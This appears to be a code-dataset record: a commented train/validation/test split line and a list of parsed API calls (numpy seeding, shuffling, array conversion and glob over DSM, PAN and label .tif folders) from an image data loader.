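#   splits = data.split_trn_vld_tst(vld_rate=0.2, tst_rate=0.1)  # nine lists of file paths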
| [((55, 8, 55, 28), 'numpy.random.seed', 'np.random.seed', ({(55, 23, 55, 27): 'seed'}, {}), '(seed)', True, 'import numpy as np\n'), ((62, 14, 62, 28), 'numpy.arange', 'np.arange', ({(62, 24, 62, 27): 'num'}, {}), '(num)', True, 'import numpy as np\n'), ((13, 26, 13, 54), 'glob.glob', 'glob.glob', ({(13, 36, 13, 53): "path + '/DSM/*.tif'"}, {}), "(path + '/DSM/*.tif')", False, 'import glob\n'), ((14, 26, 14, 54), 'glob.glob', 'glob.glob', ({(14, 36, 14, 53): "path + '/PAN/*.tif'"}, {}), "(path + '/PAN/*.tif')", False, 'import glob\n'), ((15, 28, 15, 58), 'glob.glob', 'glob.glob', ({(15, 38, 15, 57): "path + '/LABEL/*.tif'"}, {}), "(path + '/LABEL/*.tif')", False, 'import glob\n'), ((64, 12, 64, 34), 'numpy.random.shuffle', 'np.random.shuffle', ({(64, 30, 64, 33): 'idx'}, {}), '(idx)', True, 'import numpy as np\n'), ((50, 19, 50, 38), 'numpy.asarray', 'np.asarray', ({(50, 30, 50, 37): 'DSM_out'}, {}), '(DSM_out)', True, 'import numpy as np\n'), ((50, 40, 50, 59), 'numpy.asarray', 'np.asarray', ({(50, 51, 50, 58): 'PAN_out'}, {}), '(PAN_out)', True, 'import numpy as np\n'), ((50, 61, 50, 82), 'numpy.asarray', 'np.asarray', ({(50, 72, 50, 81): 'LABEL_out'}, {}), '(LABEL_out)', True, 'import numpy as np\n')] |